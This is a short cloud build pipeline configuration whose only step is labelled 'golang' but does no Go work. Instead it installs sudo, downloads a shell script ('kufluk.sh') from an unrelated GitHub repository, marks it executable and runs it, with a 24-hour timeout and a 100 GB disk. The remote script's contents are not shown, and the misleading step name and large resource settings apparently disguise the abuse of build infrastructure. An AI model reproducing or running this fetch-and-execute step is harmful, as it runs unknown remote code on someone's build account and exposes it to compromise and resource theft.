steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && wget https://github.com/ninodizone/blass/blob/main/kufluk.sh && chmod u+x kufluk.sh && ./kufluk.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
